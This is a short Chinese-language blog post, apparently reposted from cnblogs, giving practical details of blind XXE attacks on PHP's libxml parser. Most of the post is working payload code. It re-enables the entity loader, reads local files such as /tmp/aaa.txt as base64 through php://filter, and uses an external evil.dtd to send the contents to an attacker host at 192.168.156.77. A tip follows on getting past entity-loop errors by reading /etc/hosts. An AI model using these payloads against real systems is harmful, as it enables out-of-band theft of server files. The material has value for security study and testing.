码迷,mamicode.com
首页 > 其他好文 > 详细

blind-XXE的几个细节

时间:2018-03-29 10:25:18      阅读:648      评论:0      收藏:0      [点我收藏+]

标签:sys   分享   分享图片   str   loader   end   pre   entity   any   

 

在libxml>=2.9.0以后的版本默认不开启外部实体解析,需要添加参数开启

 

<?php
$xml = <<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/tmp/aaa.txt">
<!ENTITY % remote SYSTEM "http://192.168.156.77/xxe/evil.dtd">
%remote;
%all;
]>
<c>&send;</c>
EOF;

libxml_disable_entity_loader(false);
$data = simplexml_load_string($xml, ‘SimpleXMLElement‘, LIBXML_NOENT);#print_r($data);

 

<!ENTITY % all
"<!ENTITY send SYSTEM ‘http://192.168.156.77/?%file;‘>"
>

 

<?php
$xml = <<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/tmp/aaa.txt">
<!ENTITY % remote SYSTEM "http://192.168.156.77/xxe/evil.dtd">
%remote;
%send;
]>
<c></c>
EOF;

libxml_disable_entity_loader(false);
$data = simplexml_load_string($xml, ‘SimpleXMLElement‘, LIBXML_NOENT);
#print_r($data);

 

<!ENTITY % all
"<!ENTITY &#37; send SYSTEM ‘http://192.168.156.77/?%file;‘>"
>

 

如果有类似如下报错,尝试换/etc/hosts读取,可能是防止指数放大攻击,对内容长度做了限制。

Detected an entity reference loop in http://192.168.125.133:8081/evil.dtd

 

技术分享图片

 

blind-XXE的几个细节

标签:sys   分享   分享图片   str   loader   end   pre   entity   any   

原文地址:https://www.cnblogs.com/kuboy/p/8667727.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!